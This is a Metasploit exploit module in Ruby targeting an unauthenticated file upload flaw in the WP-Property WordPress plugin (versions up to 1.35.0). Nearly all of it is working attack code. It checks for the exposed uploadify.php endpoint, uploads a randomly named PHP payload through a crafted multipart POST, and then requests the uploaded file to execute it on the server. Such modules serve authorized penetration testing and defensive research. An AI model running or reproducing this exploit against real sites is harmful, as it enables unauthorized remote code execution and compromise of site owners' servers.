##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##


require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpClient
	include Msf::Exploit::PhpEXE

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
			'Description'    => %q{
					This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress
				plugin. By abusing the uploadify.php file, a malicious user can upload a file to a
				temp directory without authentication, which results in arbitrary code execution.
			},
			'Author'         =>
				[
					'Sammy FORGIT',	# initial discovery
					'James Fitts <fitts.james[at]gmail.com>' # metasploit module
				],
			'License'        => MSF_LICENSE,
			'References'     =>
				[
					[ 'OSVDB', '82656' ],
					[ 'BID', '53787' ],
					[ 'EDB', '18987'],
					[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
				],
			'Payload'	     =>
				{
					'BadChars' => "\x00",
				},
			'Platform'       => 'php',
			'Arch'		     => ARCH_PHP,
			'Targets'        =>
				[
					[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
					[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Mar 26 2012'))

		register_options(
			[
				OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
			], self.class)
	end

	def check
		uri =  target_uri.path
		uri << '/' if uri[-1,1] != '/'

		res = send_request_cgi({
			'method' => 'GET',
			'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
		})

		if not res or res.code != 200
			return Exploit::CheckCode::Unknown
		end

		return Exploit::CheckCode::Appears
	end

	def exploit
		uri =  target_uri.path
		uri << '/' if uri[-1,1] != '/'

		peer = "#{rhost}:#{rport}"

		@payload_name = "#{rand_text_alpha(5)}.php"
		php_payload = get_write_exec_payload(:unlink_self=>true)

		data = Rex::MIME::Message.new
		data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
		data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
		post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

		print_status("#{peer} - Uploading payload #{@payload_name}")
		res = send_request_cgi({
			'method' => 'POST',
			'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
			'ctype'  => "multipart/form-data; boundary=#{data.bound}",
			'data'   => post_data
		})

		if not res or res.code != 200 or res.body !~ /#{@payload_name}/
			fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
		end

		upload_uri = res.body

		print_status("#{peer} - Executing payload #{@payload_name}")
		res = send_request_raw({
			'uri'    => upload_uri,
			'method' => 'GET'
		})
	end
end